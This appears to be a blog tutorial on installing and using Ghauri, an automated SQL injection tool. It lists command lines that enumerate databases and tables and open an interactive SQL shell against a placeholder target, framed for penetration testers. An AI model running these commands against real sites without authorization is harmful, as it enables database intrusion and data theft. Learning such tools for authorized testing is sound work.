Table of contents [Show]
Introduction
Ghauri stands out as a powerful and versatile tool designed for automating advanced SQL injection attacks. Whether you're a security professional, ethical hacker, or a curious enthusiast diving into penetration testing, Ghauri offers a comprehensive set of features to detect and exploit SQL injection vulnerabilities effectively.
Installation
To harness the capabilities of Ghauri, follow these steps to install the tool on your system:
Begin by cloning the Ghauri repository using Git:
git clone https://github.com/r0oth3x49/ghauri.git
Navigate into the Ghauri directory:
cd ghauri
Execute the setup script to install Ghauri and its dependencies:
sudo python3 setup.py install
Usage
Before exploring the extensive capabilities of Ghauri.
Specify the target URL to initiate SQL injection testing:
ghauri -u http://www.vulnawebsite.com/.index?id="1"
Enumerate dummy databases available on the target server for initial assessment:
ghauri -u http://www.vulnawebsite.com/.index?id="1" --dbs
Target a specific database name and list tables within that database for detailed analysis:
ghauri -u http://www.vulnawebsite.com/.index?id="1" -D DB_NAME --tables
Now, let's dive into more advanced features and functionalities.
Load an HTTP request from a file for testing:
ghauri -r request.txt
Use a proxy to connect to the target URL:
ghauri -u http://www.vulnawebsite.com/.index?id="1" --proxy=http://127.0.0.1:8080
Set a delay in seconds between each HTTP request:
ghauri -u http://www.vulnawebsite.com/.index?id="1" --delay=5
Specify the seconds to delay the DBMS response:
ghauri -u http://www.vulnawebsite.com/.index?id="1" --time-sec=10
Prompt for an interactive SQL shell for experimental purposes:
ghauri -u http://www.vulnawebsite.com/.index?id="1" --sql-shell
Enhancing Your Testing Experience
To further enrich your testing experience with Ghauri, consider exploring additional tags and functionalities based on your specific testing requirements. Each command provides unique insights into the target database, allowing for a more comprehensive assessment of vulnerabilities.
- Check Out: How to Automate Wi-Fi Hacking with Wifite2
Conclusion
Ghauri is not just a tool; it's a gateway to mastering advanced SQL injection techniques. By utilizing its vast array of features and functionalities, security professionals and ethical hackers can elevate their cybersecurity testing capabilities and stay ahead of potential threats. Start exploring Ghauri today and unlock the full potential of SQL injection testing.
Leave a comment
Your email address will not be published. Required fields are marked *